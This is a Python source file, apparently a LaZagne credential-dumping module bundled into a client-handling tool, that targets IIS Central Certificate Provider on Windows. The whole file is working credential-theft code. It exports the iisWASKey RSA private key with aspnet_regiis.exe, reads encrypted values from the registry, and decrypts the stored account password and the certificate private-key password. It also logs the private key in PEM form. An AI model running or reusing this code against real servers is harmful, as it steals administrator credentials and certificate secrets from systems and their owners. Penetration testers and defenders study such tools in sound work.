1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
|
# -*- coding: utf-8 -*-
import base64
import fnmatch
import os
import rsa
import string
from random import *
from xml.dom import minidom
try:
import _winreg as winreg
except ImportError:
import winreg
from foreign.client_handling.lazagne.config.module_info import ModuleInfo
class IISCentralCertP(ModuleInfo):
def __init__(self):
ModuleInfo.__init__(self, name='iiscentralcertp', category='sysadmin', registry_used=True, winapi_used=True)
def find_files(self, path, file):
"""
Try to find all files with the same name
"""
founded_files = []
for dirpath, dirnames, files in os.walk(path):
for file_name in files:
if fnmatch.fnmatch(file_name, file):
founded_files.append(dirpath + '\\' + file_name)
return founded_files
def create_RSAKeyValueFile(self, exe_file, container):
tmp_file = "".join(choice(string.ascii_letters + string.digits) for x in range(randint(8, 10))) + ".xml"
try:
os.system(exe_file + " -px " + container + " " + tmp_file + " -pri > nul")
except OSError:
self.debug(u'Error executing {container}'.format(container=container))
tmp_file = ''
return tmp_file
def get_registry_key(self, reg_key, parameter):
data = ''
try:
if reg_key.startswith('HKEY_LOCAL_MACHINE'):
hkey = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, reg_key.replace('HKEY_LOCAL_MACHINE\\', ''))
data = winreg.QueryValueEx(hkey, parameter)[0]
except Exception as e:
self.debug(e)
return data
def decrypt_hash_b64(self, hash_b64, privkey):
hash = bytearray(base64.b64decode(hash_b64))
hash.reverse()
hash_b64 = base64.b64encode(hash)
hash = base64.b64decode(hash_b64)
message = rsa.decrypt(hash, privkey)
return message.decode('UTF-16')
def GetLong(self, nodelist):
rc = []
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc.append(node.data)
st = ''.join(rc)
raw = base64.b64decode(st)
return int(raw.encode('hex'), 16)
def read_RSAKeyValue(self, rsa_key_xml):
xmlStructure = minidom.parseString(rsa_key_xml)
MODULUS = self.GetLong(xmlStructure.getElementsByTagName('Modulus')[0].childNodes)
EXPONENT = self.GetLong(xmlStructure.getElementsByTagName('Exponent')[0].childNodes)
D = self.GetLong(xmlStructure.getElementsByTagName('D')[0].childNodes)
P = self.GetLong(xmlStructure.getElementsByTagName('P')[0].childNodes)
Q = self.GetLong(xmlStructure.getElementsByTagName('Q')[0].childNodes)
InverseQ = self.GetLong(xmlStructure.getElementsByTagName('InverseQ')[0].childNodes)
privkey = rsa.PrivateKey(MODULUS, EXPONENT, D, P, Q)
self.debug(u'RSA Key Value - PEM:\n {RSAkey}'.format(RSAkey=privkey.save_pkcs1(format='PEM')))
return privkey
def run(self):
pfound = []
ccp_enabled = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
'Enabled')
if ccp_enabled != 1:
self.debug(u'IIS CentralCertProvider is not enabled')
return
exe_files = self.find_files(os.environ['WINDIR'] + '\\Microsoft.NET\\Framework64\\', 'aspnet_regiis.exe')
if len(exe_files) == 0:
exe_files = self.find_files(os.environ['WINDIR'] + '\\Microsoft.NET\\Framework\\', 'aspnet_regiis.exe')
if len(exe_files) == 0:
self.debug(u'File not found aspnet_regiis.exe')
return
self.info(u'aspnet_regiis.exe files found: {files}'.format(files=exe_files))
rsa_xml_file = self.create_RSAKeyValueFile(exe_files[-1], "iisWASKey")
if rsa_xml_file == '':
self.debug(u'Problems extracting RSA Key Value')
return
with open(rsa_xml_file, 'rb') as File:
rsa_key_xml = File.read()
os.remove(rsa_xml_file)
self.debug(u'Temporary file removed: {filename}'.format(filename=rsa_xml_file))
privkey = self.read_RSAKeyValue(rsa_key_xml)
values = {}
CertStoreLocation = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
'CertStoreLocation')
values['CertStoreLocation'] = CertStoreLocation
username = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
'Username')
values['Username'] = username
pass64 = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
'Password')
values['Password'] = self.decrypt_hash_b64(pass64, privkey)
privpass64 = self.get_registry_key('HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\IIS\\CentralCertProvider',
'PrivateKeyPassword')
values['Private Key Password'] = self.decrypt_hash_b64(privpass64, privkey)
pfound.append(values)
return pfound
|